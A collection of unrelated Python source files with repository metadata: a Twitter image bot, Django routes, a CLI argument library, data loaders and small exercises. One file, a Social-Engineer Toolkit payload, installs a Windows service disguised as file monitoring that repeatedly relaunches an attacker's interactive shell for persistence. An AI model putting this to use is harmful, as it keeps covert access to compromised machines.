return '{}(nn={})'.format(self.__class__.__name__, self.nn)
| 2.40625 | 2 |
Sprint_4/Practice/F/anagram_group.py | DimaZzZz101/Yandex_Practicum_Algorithms | 0 | 12796818 | <filename>Sprint_4/Practice/F/anagram_group.py
def main():
n = int(input())
anagrams = input().strip().split()[:n]
hashes = {}
indexes = {}
for index, anagram in enumerate(anagrams):
key = ''.join(sorted(anagram))
if hashes.get(key) is None:
hashes[key] = index
indexes[index] = [index]
else:
indexes[hashes[key]].append(index)
for index in indexes.keys():
print(' '.join(map(str, indexes[index])))
if __name__ == '__main__':
main()
| 3.90625 | 4 |
bot/bot.py | Tw1ddle/geometrize-twitter-bot | 13 | 12796819 | ## @package bot
# Module that sets up the Geometrize Twitter bot.
#
# Invoke this script to run the bot i.e. "python bot.py".
import sys
import config
import dependency_locator
import geometrize
import geometrize_bot
import launch_text
import on_status_event
import tweepy
# Print welcome text.
launch_text.print_launch_text()
# Check that secrets/app credentials have been filled out.
if not config.validate_credentials():
print("Failed to validate app credentials, will exit. Did you remember to enter them in config.py?")
sys.exit(1)
# Check that the Geometrize executable is where we expect it to be.
if not dependency_locator.geometrize_executable_exists():
print("Failed to locate the Geometrize executable, will exit. Did you copy it to the 'geometrize' subdirectory? Expected it to be here: " + dependency_locator.get_geometrize_executable_path())
sys.exit(2)
# Run a quick test script to confirm Geometrize is in working order.
print("Running startup tests to ensure Geometrize is working...\r\n")
if geometrize.test_geometrize():
print("Geometrize startup tests succeeded!\r\n")
else:
print("Geometrize startup tests failed. Please report an issue here: https://github.com/Tw1ddle/geometrize-twitter-bot \r\n")
sys.exit(3)
# Connect to Twitter.
tweepy_auth = tweepy.OAuthHandler(config.OAUTH_CONSUMER_KEY, config.OAUTH_CONSUMER_SECRET)
tweepy_auth.set_access_token(config.OAUTH_ACCESS_TOKEN, config.OAUTH_ACCESS_SECRET)
tweepy_api = tweepy.API(tweepy_auth)
## Callback triggered when the stream listener connects.
def on_connect(api):
print("Twitter stream listener did connect")
## Callback triggered when the stream listener times out.
def on_timeout(api):
print("Twitter stream listener did time out")
return False
## Callback triggered when the listener encounters an error.
def on_error(api, code):
print("Encountered Twitter error response: %s" % code)
return True
## Callback triggered when the stream listener for the Geometrize bot account reports a status event.
def on_on_demand_status_event(api, status):
print("Received Twitter stream listener status event")
on_status_event.on_on_demand_status_event(api, status)
## Callback triggered when the stream listener for tracking specific Twitter accounts reports a status event.
def on_account_watcher_status_event(api, status):
print("Received Twitter stream listener status event")
on_status_event.on_account_watcher_status_event(api, status)
## Callback triggered when setting up the stream filter for tracking the Geometrize bot account.
def on_on_demand_filter_setup(stream):
print("Setting up on demand tweet filter...")
stream.filter(track = [config.TWITTER_BOT_USERNAME], is_async = True)
## Callback triggered when setting up the stream filter for tracking specific Twitter accounts.
def on_account_watcher_filter_setup(stream):
print("Setting up account watcher tweet filter...")
stream.filter(follow = config.TWITTER_BOT_WATCH_ACCOUNTS, is_async = True)
# Create and set up the on-demand Geometrize bot.
# This bot waits for users to tweet images at the bot, which it then geometrizes.
on_demand_bot = geometrize_bot.GeometrizeBot(
tweepy_auth,
tweepy_api,
on_connect,
on_timeout,
on_error,
on_on_demand_status_event,
on_on_demand_filter_setup)
# Create and set up the specific account watcher bot.
# This bot watches specific accounts and geometrizes images they tweet.
account_watcher_bot = geometrize_bot.GeometrizeBot(
tweepy_auth,
tweepy_api,
on_connect,
on_timeout,
on_error,
on_account_watcher_status_event,
on_account_watcher_filter_setup)
| 2.734375 | 3 |
src/nn/repeat.py | renmengye/imageqa-public | 100 | 12796820 | <gh_stars>10-100
class Repeat(Stage):
pass | 0.710938 | 1 |
application/urls.py | openspending/cosmopolitan | 4 | 12796821 | <reponame>openspending/cosmopolitan
from django.conf.urls import include
from django.conf.urls import url
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from rest_framework import routers
from cosmopolitan.viewsets import ContinentViewSet
from cosmopolitan.viewsets import CountryViewSet
from cosmopolitan.viewsets import RegionViewSet
from cosmopolitan.viewsets import CityViewSet
from cosmopolitan.viewsets import CurrencyViewSet
from cosmopolitan.viewsets import PostcodeViewSet
from cosmopolitan.viewsets import CountryPolygonViewSet
from cosmopolitan.viewsets import CityPolygonViewSet
from cosmopolitan.viewsets import RegionPolygonViewSet
from cosmopolitan.viewsets import PolygonViewSet
# Routers provide an easy way of automatically determining the URL conf.
router = routers.DefaultRouter()
router.register(r'continents', ContinentViewSet)
router.register(r'countries', CountryViewSet, base_name='country')
router.register(r'regions', RegionViewSet, base_name='region')
router.register(r'cities', CityViewSet, base_name='city')
router.register(r'currencies', CurrencyViewSet, base_name='currency')
router.register(r'postcodes', PostcodeViewSet, base_name='postcode')
router.register(r'countrypolygons', CountryPolygonViewSet,
base_name='countrypolygon')
router.register(r'citypolygons', CityPolygonViewSet, base_name='citypolygon')
router.register(r'regionpolygons', RegionPolygonViewSet,
base_name='regionpolygon')
router.register(r'polygons', PolygonViewSet, base_name='polygon')
urlpatterns = [
url(r'^', include(router.urls)),
url(r'^v1/', include(router.urls)),
]
urlpatterns += staticfiles_urlpatterns()
| 2.046875 | 2 |
share/oaipmh/views.py | felliott/SHARE | 0 | 12796822 | from django.views.generic.base import View
from django.template.response import HttpResponse
from share.oaipmh.repository import OAIRepository
class OAIPMHView(View):
CONTENT_TYPE = 'text/xml'
def get(self, request):
return self.oai_response(**request.GET)
def post(self, request):
return self.oai_response(**request.POST)
def oai_response(self, **kwargs):
repository = OAIRepository()
xml = repository.handle_request(self.request, kwargs)
return HttpResponse(xml, content_type=self.CONTENT_TYPE)
| 1.921875 | 2 |
klarg.py | tominekan/klarg | 0 | 12796823 | import sys
from typing import Callable, Union
# Some information about this package
__version__ = "1.1.0"
# All the command line arguments
ALL_ARGS = sys.argv[1: len(sys.argv)]
# The configuration settings, this can be changed with the config function
CONFIG = {
"needs_short_flags": False,
"long_prefix": "--",
"short_prefix": "-",
"help_flag": ("--help", "-h"),
"version_flag": ("--version", "-v")
}
"""
Here is a list of all the base functions
"""
def base_exists(name: str, args_list: list) -> bool:
return name in args_list
def base_get_all(args_list: list) -> list: # bigoof
return args_list
def base_get_bool(
name: str,
args_list: list,
short: str = "default-str"
) -> bool:
long_name = CONFIG["long_prefix"] + name
short_name = CONFIG["short_prefix"] + short
if short == "default-short":
if (CONFIG["needs_short_flags"]):
raise Exception(
"No short flag for get_bool()"
)
else:
if base_exists(long_name, args_list):
return True
else:
return False
else:
if base_exists(long_name, args_list):
return True
if base_exists(short_name, args_list):
return True
else:
return False
def base_on_help(action: Callable, args_list: list) -> None:
"""
`action: function: NEEDED`
The `action` is run when klarg detects the help flag.
What klarg looks for can be configured in `CONFIG`
with the option `"help_flag"`.
Example:
```py
# docs_example.py
import klarg
def display_help_message():
print("Here you go")
klarg.on_help(display_help_message)
# python docs_example.py --help
# Here you go
```
"""
long_help, short_help = CONFIG["help_flag"]
if base_exists(long_help, args_list):
action()
if base_exists(short_help, args_list):
action()
def base_on_version(message: str, args_list: list) -> None:
"""
`message: str: NEEDED`
Klarg displays the `message` when the version flag is detected.
What klarg looks for can be configured in `CONFIG`
with the option `"version_flag"`.
Example:
```py
# docs_example.py
import klarg
klarg.project_version("This project version is 1.2.3")
# python docs_example.py --version
# This project version is 1.2.3
```
"""
long_version, short_version = CONFIG["version_flag"]
if exists(long_version) or exists(short_version):
print(message)
if base_exists(short_version, args_list):
print(message)
def base_get_str(
name: str,
args_list: list,
short: str = "default-short",
on_error: dict = {}
) -> Union[str, None]:
"""
`name: str: NEEDED`
`short: str: optional`
`on_error: function: optional`
`get_str` is a function that collects a `name`,
which is the multi letter flag, a `short`, which is the
shortened version of the flag. There is only one type of
errors it can encounter, which is when no value is provided.
Because of this, `on_error` is not a dictionary,
but a special function that handles when no value is provided.
Example:
```py
# docs_example.py
import klarg
def handle_error_none():
print(f"No values provided")
some_str = klarg.get_str("--some-str", "-s", on_error=handle_error_none)
print(f"{some_str} is cool")
# python docs_example.py --some-str
# No values provided
# python docs_example.py -s "klarg"
# klarg is cool
```
"""
long_name = CONFIG["long_prefix"] + name
short_name = CONFIG["short_prefix"] + short
# Checks if a given argument is a value or not.
def is_valid_value(arg: str) -> bool:
# Makes sure it is not a multi letter flag
if arg.startswith(CONFIG["long_prefix"]):
return False
# Makes sure it is not a short flag
if arg.startswith(CONFIG["short_prefix"]):
return False
# Makes sure it is not part of the version or help flags
if (arg in CONFIG["version_flag"]) or (arg in CONFIG["help_flag"]):
return False
else:
return True
# Default handling for ERR_NONE
def default_handle_none():
print(f"ERR_NONE: There is no value provided for {long_name}")
exit(1)
# Default handling for ERR_MUL
def default_handle_mul():
print(f"ERR_MUL: There are multiple values provided for {long_name}")
exit(1)
def is_key(key, dict: dict) -> bool:
if key in dict.keys():
return True
else:
return False
non_existent_long_name = not base_exists(long_name, args_list)
non_existent_short_name = not base_exists(short_name, args_list)
# Does not exist in command line args
if non_existent_long_name and non_existent_short_name:
return None
# Configure error_handling
if not is_key("ERR_NONE", on_error):
on_error["ERR_NONE"] = default_handle_none
if not is_key("ERR_MUL", on_error):
on_error["ERR_MUL"] = default_handle_mul
# ERR_NONE
# Ther cannot be enough space for the argument and
# it's value
if len(ALL_ARGS) < 2:
on_error["ERR_NONE"]()
# ERR_MUL
# If there is more than one occurence of short_name or long_name
if (args_list.count(long_name) > 1) or (args_list.count(short_name) > 1):
on_error["ERR_MUL"]()
# ERR_MUL
# if both short and long arguments exists
long_args_exists = base_exists(long_name, args_list)
short_args_exists = base_exists(short_name, args_list)
if long_args_exists and short_args_exists:
on_error["ERR_MUL"]()
# Gets the next value of the given flag
def get_next_value(flag: str) -> str:
index_point = args_list.index(flag)
next_value = args_list[(index_point + 1)]
if (is_valid_value(next_value)):
return next_value
else: # ERR_NONE
# If there is no argument passed to
# long_args
on_error["ERR_NONE"]()
if short == "default-short":
if (CONFIG["needs_short_flags"]):
raise Exception(
f"No short flag for {long_name}"
)
else:
return get_next_value(long_name)
else:
if base_exists(long_name, args_list):
return get_next_value(long_name)
elif base_exists(short_name, args_list):
return get_next_value(short_name)
else: # If it does not exist
return None
def base_get_num(
name: str,
args_list: dict,
short: str = "default-short",
on_error: dict = {},
) -> Union[int, float, None]:
def is_key(key, dict: dict) -> bool:
if key in dict.keys():
return True
else:
return False
def to_num(string: str) -> Union[int, float, str]:
if "." in string:
return float(string)
else:
try:
return int(string)
except ValueError:
return string
# Default handling for ERR_NUM
def default_handle_num(value):
print(f"ERR_NUM: \"{value}\" is not a number")
exit(1)
if not is_key("ERR_NUM", on_error):
on_error["ERR_NUM"] = default_handle_num
value = base_get_str(
name=name,
short=short,
on_error=on_error,
args_list=ALL_ARGS
)
num = to_num(value)
if type(num) == str:
on_error["ERR_NUM"](value)
else:
return num
"""
-------------------------------------------- KLARG BASIC
"""
def exists(name: str) -> bool:
"""
`name: str: NEEDED`
Checks if the `name` exists in the list of command line arguments given,
this was designed to be an internal function for making things more
readable, but then I realized that it could potentially be helpful.
Example:
```py
# docs_example.py
import klarg
something_exists = klarg.exists("something")
if something_exists:
print("Something exists")
else:
print("Nothing exists (that's kind of dark)")
# python docs_example.py does something exist
# Something exists
# python docs_example.py does nothing exist
# Nothing exists (that's kind of dark)
```
"""
return base_exists(name=name, args_list=ALL_ARGS)
def get_all() -> list:
"""
Collects all the arguments passed and returns them all as a tuple
full of strings. This is useful when a program needs to collect
a list of all the arguments passed on to operate on,
it passes everything single option passed to the file
Example:
` ```py
# docs_example.py
import klarg
all_args = klarg.get_all()
print(f"All args {all_args}")
# python docs_example.py -a -b "c" -d --efgh --ijklmn 0
# All args ("-a", "-b", "c", "-d", "--efgh", "--ijklmn", "0")
```
"""
return ALL_ARGS
def get_bool(name: str, short: str = "default-short") -> bool:
"""
`name: str: NEEDED`
`short: str: optional`
`get_bool` is a function that collects `name`, a string, and `short`,
also a string. `name` is the long name for the command line argument,
i.e. (`--long-name`). `short` is the shorter name for the command
line argument (`-s`). Normally, if `short` is not given,
then it will not raise an error, unless `"needs_short_flags"`
is set to `True` in `CONFIG`.
Example:
```py
# docs_example.py
import klarg
is_there = klarg.bool("--is-there", "-i")
if (is_there):
print("Is there")
else:
print("Is not there")
# python docs_example.py
# Is not there
# python docs_example.py --is-there
# is there
```
"""
return base_get_bool(
name=name,
short=short,
args_list=ALL_ARGS
)
def on_help(action: Callable) -> None:
"""
`action: function: NEEDED`
The `action` is run when klarg detects the help flag.
What klarg looks for can be configured in `CONFIG`
with the option `"help_flag"`.
Example:
```py
# docs_example.py
import klarg
def display_help_message():
print("Here you go")
klarg.on_help(display_help_message)
# python docs_example.py --help
# Here you go
```
"""
return base_on_help(
action=action,
args_list=ALL_ARGS
)
def on_version(message: str) -> None:
"""
`message: str: NEEDED`
Klarg displays the `message` when the version flag is detected.
What klarg looks for can be configured in `CONFIG`
with the option `"version_flag"`.
Example:
```py
# docs_example.py
import klarg
klarg.project_version("This project version is 1.2.3")
# python docs_example.py --version
# This project version is 1.2.3
```
"""
return base_on_version(
message=message,
args_list=ALL_ARGS
)
def get_str(
name: str,
short: str = "default-short",
on_error: dict = {}
) -> Union[str, None]:
"""
`name: str: NEEDED`
`short: str: optional`
`on_error: function: optional`
`get_str` is a function that collects a `name`,
which is the multi letter flag, a `short`, which is the
shortened version of the flag. There is only one type of
errors it can encounter, which is when no value is provided.
Because of this, `on_error` is not a dictionary,
but a special function that handles when no value is provided.
Example:
```py
# docs_example.py
import klarg
def handle_error_none():
print(f"No values provided")
some_str = klarg.get_str("--some-str", "-s", on_error=handle_error_none)
print(f"{some_str} is cool")
# python docs_example.py --some-str
# No values provided
# python docs_example.py -s "klarg"
# klarg is cool
```
"""
return base_get_str(
name=name,
short=short,
on_error=on_error,
args_list=ALL_ARGS
)
def get_num(
name: str,
short: str = "default-short",
on_error: dict = {}
) -> Union[int, float, None]:
"""
`name: str: NEEDED`
`short: str: optional`
`on_error: dict: optional`
`get_num` is a function that collects a `name`,
which is the multi letter flag, a `short`,
which is the shortened version of the flag.
There are two possible types of errors it can encounter,
one being that the value it got was not a number, it did not
get a value at all, or that there are multiple declarations of that flag.
he error names are `ERR_NUM`, `ERR_NONE` and `ERR_MUL` respectively.
`on_error` is a dictionary, all three keys,
`ERR_NUM`,`ERR_NONE` and `ERR_MUL` are not all needed,
because there is default handling for those types of errors.
However, if there is no flag with the name of `name`,
then `get_num` returns None.
Example:
```py
# docs_example.py
import klarg
def handle_error_num(value):
print(f"{value} is not a number")
def handle_error_none():
print("No values provided")
error_handlers = {
"ERR_NUM": handle_error_num(),
"ERR_NONE": handle_error_none()
}
number_something = klarg.get_num(
name="--number-something",
short="-n", on_error=error_handlers
)
print(f"The suprise number is {number_something}")
# python docs_example.py -n 1a
# 1a is not a number
# python docs_example.py -n
# No values provided
# python docs_example.py -n 12345
# The suprise number is 12345
```
"""
return base_get_num(
name=name,
short=short,
on_error=on_error,
args_list=ALL_ARGS
)
class command():
"""
`name: str: NEEDED`
This creates a class with the command line that has the functions
`project_version()`, `on_help()`, `get_num()`, `get_str()`,
`get_bool()`, and `get_all()`. The only difference is that
the arguments are parsed after the declaration of the command.
This means that if you have a list of command line arguments
`["-f", "reply", "-n", "12", "example.txt"]`,
and the command name is `reply`. The available command line arguments
are `["-n", "12", "example.txt"]`
"""
def __init__(self, name: str):
beginning_index = ALL_ARGS.index(name) + 1
self.all_arguments = ALL_ARGS[beginning_index: len(ALL_ARGS)]
def exists(self, name: str) -> bool:
"""
`name: str: NEEDED`
Checks if the `name` exists in the list of command line
arguments given, this was designed to be an
internal function for making things more readable, but then
I realized that it could potentially be helpful.
Example:
```py
# docs_example.py
import klarg
something_exists = klarg.exists("something")
if something_exists:
print("Something exists")
else:
print("Nothing exists (that's kind of dark)")
# python docs_example.py does something exist
# Something exists
# python docs_example.py does nothing exist
# Nothing exists (that's kind of dark)
```
"""
return base_exists(name=name, args_list=self.all_arguments)
def get_all(self) -> list:
"""
Collects all the arguments passed and returns them all as a tuple
full of strings. This is useful when a program needs to collect
a list of all the arguments passed on to operate on,
it passes everything single option passed to the file
Example:
` ```py
# docs_example.py
import klarg
all_args = klarg.get_all()
print(f"All args {all_args}")
# python docs_example.py -a -b "c" -d --efgh --ijklmn 0
# All args ("-a", "-b", "c", "-d", "--efgh", "--ijklmn", "0")
```
"""
return base_get_all(self.all_arguments)
def get_bool(self, name: str, short: str = "default-short") -> bool:
"""
`name: str: NEEDED`
`short: str: optional`
`get_bool` is a function that collects `name`, a string, and `short`,
also a string. `name` is the long name for the command line argument,
i.e. (`--long-name`). `short` is the shorter name for the command
line argument (`-s`). Normally, if `short` is not given,
then it will not raise an error, unless `"needs_short_flags"`
is set to `True` in `CONFIG`.
Example:
```py
# docs_example.py
import klarg
is_there = klarg.bool("--is-there", "-i")
if (is_there):
print("Is there")
else:
print("Is not there")
# python docs_example.py
# Is not there
# python docs_example.py --is-there
# is there
```
"""
return base_get_bool(
name=name,
short=short,
args_list=self.all_arguments
)
def on_help(self, action: Callable) -> None:
"""
`action: function: NEEDED`
The `action` is run when klarg detects the help flag.
What klarg looks for can be configured in `CONFIG`
with the option `"help_flag"`.
Example:
```py
# docs_example.py
import klarg
def display_help_message():
print("Here you go")
klarg.on_help(display_help_message)
# python docs_example.py --help
# Here you go
```
"""
return base_on_help(
action=action,
args_list=self.all_arguments
)
def on_version(self, message: str) -> None:
"""
`message: str: NEEDED`
Klarg displays the `message` when the version flag is detected.
What klarg looks for can be configured in `CONFIG`
with the option `"version_flag"`.
Example:
```py
# docs_example.py
import klarg
klarg.project_version("This project version is 1.2.3")
# python docs_example.py --version
# This project version is 1.2.3
```
"""
return base_on_version(
message=message,
args_list=self.all_arguments
)
def get_str(
self,
name: str,
short: str = "default-short",
on_error: dict = {}
) -> Union[str, None]:
"""
`name: str: NEEDED`
`short: str: optional`
`on_error: function: optional`
`get_str` is a function that collects a `name`,
which is the multi letter flag, a `short`, which is the
shortened version of the flag. There is only one type of
errors it can encounter, which is when no value is provided.
Because of this, `on_error` is not a dictionary,
but a special function that handles when no value is provided.
Example:
```py
# docs_example.py
import klarg
def handle_error_none():
print(f"No values provided")
some_str = klarg.get_str(
"--some-str",
"-s",
on_error=handle_error_none
)
print(f"{some_str} is cool")
# python docs_example.py --some-str
# No values provided
# python docs_example.py -s "klarg"
# klarg is cool
```
"""
return base_get_str(
name=name,
short=short,
on_error=on_error,
args_list=self.all_arguments
)
def get_num(
self,
name: str,
short: str = "default-short",
on_error: dict = {}
) -> Union[int, float, None]:
"""
`name: str: NEEDED`
`short: str: optional`
`on_error: dict: optional`
`get_num` is a function that collects a `name`,
which is the multi letter flag, a `short`,
which is the shortened version of the flag.
There are two possible types of errors it can encounter,
one being that the value it got was not a number, it did not
get a value at all, or that there are multiple declarations of that
flag. he error names are `ERR_NUM`, `ERR_NONE` and `ERR_MUL`
respectively. `on_error` is a dictionary, all three keys,
`ERR_NUM`,`ERR_NONE` and `ERR_MUL` are not all needed,
because there is default handling for those types of errors.
However, if there is no flag with the name of `name`,
then `get_num` returns None.
Example:
```py
# docs_example.py
import klarg
def handle_error_num(value):
print(f"{value} is not a number")
def handle_error_none():
print("No values provided")
error_handlers = {
"ERR_NUM": handle_error_num(),
"ERR_NONE": handle_error_none()
}
number_something = klarg.get_num(
name="--number-something",
short="-n", on_error=error_handlers
)
print(f"The suprise number is {number_something}")
# python docs_example.py -n 1a
# 1a is not a number
# python docs_example.py -n
# No values provided
# python docs_example.py -n 12345
# The suprise number is 12345
```
"""
return base_get_num(
name=name,
short=short,
on_error=on_error,
args_list=self.all_arguments
)
| 2.6875 | 3 |
src/Jupyter/Jupyter_frontend.py | Chaostheeory/Insight-DOTA-Mine | 0 | 12796824 | import pandas as pd
import psycopg2
#from sqlalchemy import create_engine
psql_credeintal = {
'database': 'wode',
'user': 'wode',
'password': '***',
'host': '192.168.3.11',
'port': '5432'
}
con = psycopg2.connect(**psql_credeintal)
def get_winrate(user_id):
query = "SELECT position, winrate FROM positions WHERE user_id='%s' order by position" % user_id
query_results = pd.read_sql_query(query,con)
return query_results
get_winrate(119807644)
| 2.953125 | 3 |
python_tuto_string_formatting.py | khinthandarkyaw98/Python_Practice | 0 | 12796825 | # python string formatting
# a placeholder where you want to display the price
price = 49
txt = 'The price is {} dollars'
print(txt.format(price))
# Display a number with two decimals
txt = 'The price is {:.2f} dollars.'
print(txt.format(price))
# multiple values
quantity = 3
itemno = 567
price = 49
myorder = 'I want {} pieces of item number {} for {:.2f} dollars.'
print(myorder.format(quantity, itemno, price))
# index number
myorder = 'I want {0} pieces of item number {1} for {2:.2f} dollars.'
print(myorder.format(quantity, itemno, prince))
# if you want to refer to the same value more than once, use the index number.
age = 36
name = 'John'
txt = 'His name is {1}. {1} is {0} years old.'
print(txt.format(age, name))
# named indexes
myorder = 'I have a {carname}, it is a {model}.'
print(myorder.format(carname = 'Ford', model = 'Mustang')) | 4.125 | 4 |
digits/inference/__init__.py | ojmakhura/DIGITS | 0 | 12796826 | # Copyright (c) 2016-2017, NVIDIA CORPORATION. All rights reserved.
from .images import ImageInferenceJob
from .job import InferenceJob
__all__ = [
'InferenceJob',
'ImageInferenceJob',
]
| 1.054688 | 1 |
src/emmental/schedulers/scheduler.py | KeAWang/emmental | 0 | 12796827 | """Emmental scheduler."""
from abc import ABC, abstractmethod
from typing import Any, Iterator, List
from emmental.data import EmmentalDataLoader
from emmental.model import EmmentalModel
class Scheduler(ABC):
"""Generate batch generator from dataloaders in designed order."""
def __init__(self) -> None:
"""Initialize Scheduler."""
pass
def get_num_batches(self, dataloaders: List[EmmentalDataLoader]) -> int:
"""Get total number of batches per epoch.
Args:
dataloaders: List of dataloaders.
Returns:
Total number of batches per epoch.
"""
raise NotImplementedError()
@abstractmethod
def get_batches(
self, dataloaders: List[EmmentalDataLoader], model: EmmentalModel = None
) -> Iterator[Any]:
"""Generate batch generator from all dataloaders for one epoch.
Args:
dataloaders: List of dataloaders.
model: The training model, defaults to None.
Returns:
A generator of all batches.
"""
raise NotImplementedError()
| 3.234375 | 3 |
reports/utils.py | Rakib1508/django-sales-stat | 0 | 12796828 | from django.core.files.base import ContentFile
import base64
import uuid
def get_report_image(data):
_, image_binary = data.split(';base64')
decoded_image = base64.b64decode(image_binary)
img_name = str(uuid.uuid4())[:10] + '.png'
data = ContentFile(decoded_image, name=img_name)
return data
| 2.1875 | 2 |
src/payloads/set_payloads/persistence.py | rockstar9788/socialtoolkit | 0 | 12796829 | #!/usr/bin/python
#
##########################################################################
#
# Social-Engineer Toolkit Persistence Service
#
# Right now this is a pretty lame attempt at a service but will grow over time. The text file it reads in from isn't
# really a good idea, but it's a start.
#
##########################################################################
#
# ex usage: persistence.exe install, start, stop, remove
#
# You can see output of this program running python site-packages\win32\lib\win32traceutil for debugging
#
##########################################################################
import win32service
import win32serviceutil
import win32event
import win32evtlogutil
import win32traceutil
import servicemanager
import winerror
import time
import sys
import os
import subprocess
class aservice(win32serviceutil.ServiceFramework):
_svc_name_ = "windows_monitoring"
_svc_display_name_ = "Windows File Monitoring Service"
_svc_deps_ = ["EventLog"]
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
self.isAlive = True
def SvcStop(self):
# tell Service Manager we are trying to stop (required)
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
# set the event to call
win32event.SetEvent(self.hWaitStop)
self.isAlive = False
def SvcDoRun(self):
import servicemanager
# wait for beeing stopped ...
self.timeout = 1000 # In milliseconds (update every second)
while self.isAlive:
# wait for service stop signal, if timeout, loop again
rc = win32event.WaitForSingleObject(self.hWaitStop, self.timeout)
# expand the filesystem path
windir = os.environ['WINDIR']
# grab homepath
homedir_path = os.getenv("SystemDrive")
homedir_path = homedir_path + "\\Program Files\\Common Files\\"
# pull the windows operating system version number
windows_version = sys.getwindowsversion()[2]
# pull integer of version number
windows_version = int(windows_version)
# windows XP and below
if windows_version < 3791:
fileopen = open("%s\\system32\\isjxwqjs" % (windir), "r")
# windows 7, vista, 2008, etc. that might have UAC so we write to
# AppData instead
if windows_version > 3791:
fileopen = open("%s\\isjxwqjs" % (homedir_path), "r")
for line in fileopen:
# pull set-path, this is pulled from interactive shell and
# written when persistence is called
set_path = line.rstrip()
# specify filename to execute the SET interactive shell
subprocess.Popen('%s' % (set_path), shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# sleep 30 mins
time.sleep(1800)
self.ReportServiceStatus(win32service.SERVICE_STOPPED)
return
if __name__ == '__main__':
# f its called with arguments then run
if len(sys.argv) == 1:
try:
evtsrc_dll = os.path.abspath(servicemanager.__file__)
servicemanager.PrepareToHostSingle(aservice)
servicemanager.Initialize('aservice', evtsrc_dll)
servicemanager.StartServiceCtrlDispatcher()
except win32service.error as details:
if details[0] == winerror.ERROR_FAILED_SERVICE_CONTROLLER_CONNECT:
win32serviceutil.usage()
else:
win32serviceutil.HandleCommandLine(aservice)
| 1.953125 | 2 |
data_loader.py | prl900/generative_precipitation | 0 | 12796830 | <gh_stars>0
import numpy as np
import xarray as xr
class DataLoader():
def __init__(self):
# Load ERA5 geopotential levels
era5_ds1 = xr.open_dataset("./datasets/GEOP1000_GAN_2017.nc")
era5_ds2 = xr.open_dataset("./datasets/GEOP800_GAN_2017.nc")
era5_ds3 = xr.open_dataset("./datasets/GEOP500_GAN_2017.nc")
era5_times = era5_ds1.time[:].data
# Load ERA5 total precipitation
prec_ds = xr.open_dataset("./datasets/TP_GAN_2017.nc")
prec_times = prec_ds.time[:].data
# Find common dates and shuffle
times = np.intersect1d(era5_times, prec_times)
np.random.shuffle(times)
# Create geopotential normalised stack
z500 = era5_ds3.Geopotential.sel(time=times[::10])[:].data
z500 = (z500 - z500.min()) / (z500.max() - z500.min())
z800 = era5_ds2.Geopotential.sel(time=times[::10])[:].data
z800 = (z800 - z800.min()) / (z800.max() - z800.min())
z1000 = era5_ds1.Geopotential.sel(time=times[::10])[:].data
z1000 = (z1000 - z1000.min()) / (z1000.max() - z1000.min())
z = np.stack((z1000, z800, z500), axis=3)
z = (z * 2) - 1
# Create precipitation normalised stack
tp = prec_ds.tp.sel(time=times[::10])[:].data * 1000
tp = np.clip(tp, 0, 30)
tp1 = tp / 30
tp2 = np.log(1+tp)/np.log(31)
tp3 = np.log(1+np.log(1+tp))
tp3 = np.clip(tp3, 0, 1)
tp = np.stack((tp3, tp3, tp3), axis=3)
tp = (tp * 2) - 1
self.prec_train = tp[:600,:,:,:]
self.era5_train = z[:600,:,:,:]
self.prec_test = tp[600:750,:,:,:]
self.era5_test = z[600:750,:,:,:]
self.prec_val = tp[750:,:,:]
self.era5_val = z[750:,:,:]
def load_data(self, batch_size=1, is_testing=False):
if is_testing:
idx = np.random.choice(self.prec_test.shape[0], size=batch_size)
return self.prec_test[idx,:,:,:], self.era5_test[idx,:,:,:]
else:
idx = np.random.choice(self.prec_train.shape[0], size=batch_size)
return self.prec_train[idx,:,:,:], self.era5_train[idx,:,:,:]
def load_batch(self, batch_size=1, is_testing=False):
prec_data = None
him_data = None
if is_testing:
prec_data = self.prec_test
him_data = self.era5_test
else:
prec_data = self.prec_train
him_data = self.era5_train
self.n_batches = int(prec_data.shape[0] / batch_size)
for i in range(self.n_batches-1):
yield prec_data[i*batch_size:(i+1)*batch_size,:,:,:], him_data[i*batch_size:(i+1)*batch_size,:,:,:]
| 2.15625 | 2 |
tests/paradrop/lib/utils/test_utils.py | VegetableChook/Paradrop | 1 | 12796831 | <gh_stars>1-10
import copy
import errno
import os
import tempfile
from mock import MagicMock, Mock, patch
from nose.tools import assert_raises
from pdmock import MockChute, MockChuteStorage, writeTempFile
from paradrop.lib.utils import pdos
from paradrop.lib.utils import pdosq
from paradrop.lib.utils.pd_storage import PDStorage
NETWORK_WAN_CONFIG = """
config interface wan #__PARADROP__
option ifname 'eth0'
option proto 'dhcp'
"""
class TestStorage(PDStorage):
def __init__(self, filename):
super(TestStorage, self).__init__(filename, 0)
self.data = None
def setAttr(self, data):
self.data = data
def getAttr(self):
return self.data
def attrSaveable(self):
return (self.data is not None)
def test_addresses():
"""
Test IP address utility functions
"""
from paradrop.lib.utils import addresses
ipaddr = "192.168.1.1"
assert addresses.isIpValid(ipaddr)
ipaddr = "192.168.1.256"
assert not addresses.isIpValid(ipaddr)
chute = MockChute(name="first")
chute.IPs.append("192.168.1.1")
chute.SSIDs.append("Paradrop")
chute.staticIPs.append("192.168.33.1")
storage = MockChuteStorage()
storage.chuteList.append(chute)
assert not addresses.isIpAvailable("192.168.1.1", storage, "second")
assert addresses.isIpAvailable("192.168.2.1", storage, "second")
assert addresses.isIpAvailable("192.168.1.1", storage, "first")
assert not addresses.isWifiSSIDAvailable("Paradrop", storage, "second")
assert addresses.isWifiSSIDAvailable("available", storage, "second")
assert addresses.isWifiSSIDAvailable("Paradrop", storage, "first")
assert not addresses.isStaticIpAvailable("192.168.33.1", storage, "second")
assert addresses.isStaticIpAvailable("192.168.35.1", storage, "second")
assert addresses.isStaticIpAvailable("192.168.33.1", storage, "first")
assert not addresses.checkPhyExists(-100)
ipaddr = "192.168.1.1"
netmask = "255.255.255.0"
assert addresses.incIpaddr("192.168.1.1") == "192.168.1.2"
assert addresses.incIpaddr("fail") is None
assert addresses.maxIpaddr(ipaddr, netmask) == "192.168.1.254"
assert addresses.maxIpaddr(ipaddr, "fail") is None
assert addresses.getSubnet(ipaddr, netmask) == "192.168.1.0"
assert addresses.getSubnet(ipaddr, "fail") is None
# Test with nothing in the cache
assert addresses.getInternalIntfList(chute) is None
assert addresses.getGatewayIntf(chute) == (None, None)
assert addresses.getWANIntf(chute) is None
# Now put an interface in the cache
ifaces = [{
